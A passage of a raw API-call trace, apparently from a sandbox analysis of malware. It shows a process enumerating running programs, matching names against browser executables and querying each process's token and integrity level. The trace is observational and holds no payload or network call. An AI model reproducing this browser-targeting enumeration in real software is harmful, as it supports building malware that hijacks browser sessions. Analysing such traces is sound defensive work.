lpString2="ONENOTEM.EXE") returned -1 [0218.241] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0218.241] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0218.241] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0218.241] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0218.241] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x114) returned 0x0 [0218.241] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0xb4 [0218.241] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0218.241] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0218.241] GetLastError () returned 0x7a [0218.241] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0218.241] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0218.241] CloseHandle (hObject=0xb8) returned 1 [0218.241] CloseHandle (hObject=0xb4) returned 1 [0218.241] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0218.241] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0xb4 [0218.241] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x166ee0, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0218.241] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0218.242] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0218.242] GetLastError () returned 0x7a [0218.242] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0218.242] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0218.242] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0218.242] CloseHandle (hObject=0xb8) returned 1 [0218.242] CloseHandle (hObject=0xb4) returned 1 [0218.242] lstrcmpiW (lpString1="firefox.exe", lpString2="undertake.exe") returned -1 [0218.242] lstrcmpiW (lpString1="chrome.exe", lpString2="undertake.exe") returned -1 [0218.242] lstrcmpiW (lpString1="opera.exe", lpString2="undertake.exe") returned -1 [0218.242] lstrcmpiW (lpString1="iexplore.exe", lpString2="undertake.exe") returned -1 [0218.242] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="undertake.exe") returned -1 [0218.242] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="undertake.exe") returned -1 [0218.242] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0xb4 [0218.242] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0218.242] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0218.242] GetLastError () returned 0x7a [0218.242] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0218.242] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0218.242] CloseHandle (hObject=0xb8) returned 1 [0218.242] CloseHandle (hObject=0xb4) returned 1 [0218.242] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0218.242] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0xb4 [0218.242] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x167290, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0218.242] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0218.242] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0218.242] GetLastError () returned 0x7a [0218.242] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0218.242] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0218.242] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0218.242] CloseHandle (hObject=0xb8) returned 1 [0218.242] CloseHandle (hObject=0xb4) returned 1 [0218.243] lstrcmpiW (lpString1="firefox.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0218.243] lstrcmpiW (lpString1="chrome.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0218.243] lstrcmpiW (lpString1="opera.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0218.243] lstrcmpiW (lpString1="iexplore.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0218.243] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0218.243] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0218.243] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0xb4 [0218.243] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0218.243] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0218.243] GetLastError () returned 0x7a [0218.243] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0218.243] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0218.243] CloseHandle (hObject=0xb8) returned 1 [0218.243] CloseHandle (hObject=0xb4) returned 1 [0218.243] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0218.243] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0xb4 [0218.243] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x1673e8, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0218.243] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0218.243] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0218.243] GetLastError () returned 0x7a [0218.243] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0218.243] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0218.243] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0218.243] CloseHandle (hObject=0xb8) returned 1 [0218.243] CloseHandle (hObject=0xb4) returned 1 [0218.243] lstrcmpiW (lpString1="firefox.exe", lpString2="devon stickers.exe") returned 1 [0218.243] lstrcmpiW (lpString1="chrome.exe", lpString2="devon stickers.exe") returned -1 [0218.243] lstrcmpiW (lpString1="opera.exe", lpString2="devon stickers.exe") returned 1 [0218.243] lstrcmpiW (lpString1="iexplore.exe", lpString2="devon stickers.exe") returned 1 [0218.243] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="devon stickers.exe") returned 1 [0218.243] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="devon stickers.exe") returned 1 [0218.243] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0xb4 [0218.243] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0218.244] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0218.244] GetLastError () returned 0x7a [0218.244] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0218.244] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0218.244] CloseHandle (hObject=0xb8) returned 1 [0218.244] CloseHandle (hObject=0xb4) returned 1 [0218.244] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0218.244] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0xb4 [0218.244] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x167568, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0218.244] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0218.244] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0218.244] GetLastError () returned 0x7a [0218.244] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0218.244] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0218.244] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0218.244] CloseHandle (hObject=0xb8) returned 1 [0218.244] CloseHandle (hObject=0xb4) returned 1 [0218.244] lstrcmpiW (lpString1="firefox.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0218.244] lstrcmpiW (lpString1="chrome.exe", lpString2="eagles_podcast_type_marker.exe") returned -1 [0218.244] lstrcmpiW (lpString1="opera.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0218.244] lstrcmpiW (lpString1="iexplore.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0218.244] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0218.244] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0218.244] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f4) returned 0xb4 [0218.244] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0218.244] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0218.244] GetLastError () returned 0x7a [0218.244] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0218.244] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0218.244] CloseHandle (hObject=0xb8) returned 1 [0218.244] CloseHandle (hObject=0xb4) returned 1 [0218.244] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0218.244] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f4) returned 0xb4 [0218.244] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x1676c8, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0218.245] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0218.245] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0218.245] GetLastError () returned 0x7a [0218.245] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0218.245] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0218.245] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0218.245] CloseHandle (hObject=0xb8) returned 1 [0218.245] CloseHandle (hObject=0xb4) returned 1 [0218.245] lstrcmpiW (lpString1="firefox.exe", lpString2="groups.exe") returned -1 [0218.245] lstrcmpiW (lpString1="chrome.exe", lpString2="groups.exe") returned -1 [0218.245] lstrcmpiW (lpString1="opera.exe", lpString2="groups.exe") returned 1 [0218.245] lstrcmpiW (lpString1="iexplore.exe", lpString2="groups.exe") returned 1 [0218.245] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="groups.exe") returned 1 [0218.245] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="groups.exe") returned 1 [0218.245] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x810) returned 0xb4 [0218.245] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0218.245] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0218.245] GetLastError () returned 0x7a [0218.245] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0218.245] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0218.245] CloseHandle (hObject=0xb8) returned 1 [0218.245] CloseHandle (hObject=0xb4) returned 1 [0218.245] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0218.245] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x810) returned 0xb4 [0218.245] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x167840, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0218.245] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0218.245] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0218.245] GetLastError () returned 0x7a [0218.245] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0218.245] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0218.245] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0218.245] CloseHandle (hObject=0xb8) returned 1 [0218.245] CloseHandle (hObject=0xb4) returned 1 [0218.246] lstrcmpiW (lpString1="firefox.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0218.246] lstrcmpiW (lpString1="chrome.exe", lpString2="filesdetectedlosebenjamin.exe") returned -1 [0218.246] lstrcmpiW (lpString1="opera.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0218.246] lstrcmpiW (lpString1="iexplore.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0218.246] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0218.246] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0218.246] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x820) returned 0xb4 [0218.246] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0218.246] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0218.246] GetLastError () returned 0x7a [0218.246] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0218.246] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0218.246] CloseHandle (hObject=0xb8) returned 1 [0218.246] CloseHandle (hObject=0xb4) returned 1 [0218.246] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0218.246] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x820) returned 0xb4 [0218.246] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x167990, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0218.246] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0218.246] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0218.246] GetLastError () returned 0x7a [0218.246] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0218.246] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0218.246] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0218.246] CloseHandle (hObject=0xb8) returned 1 [0218.246] CloseHandle (hObject=0xb4) returned 1 [0218.246] lstrcmpiW (lpString1="firefox.exe", lpString2="cincinnati consumers se.exe") returned 1 [0218.246] lstrcmpiW (lpString1="chrome.exe", lpString2="cincinnati consumers se.exe") returned -1 [0218.246] lstrcmpiW (lpString1="opera.exe", lpString2="cincinnati consumers se.exe") returned 1 [0218.246] lstrcmpiW (lpString1="iexplore.exe", lpString2="cincinnati consumers se.exe") returned 1 [0218.246] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="cincinnati consumers se.exe") returned 1 [0218.246] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="cincinnati consumers se.exe") returned 1 [0218.246] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x838) returned 0xb4 [0218.246] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0218.247] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0218.247] GetLastError () returned 0x7a [0218.247] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0218.247] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, 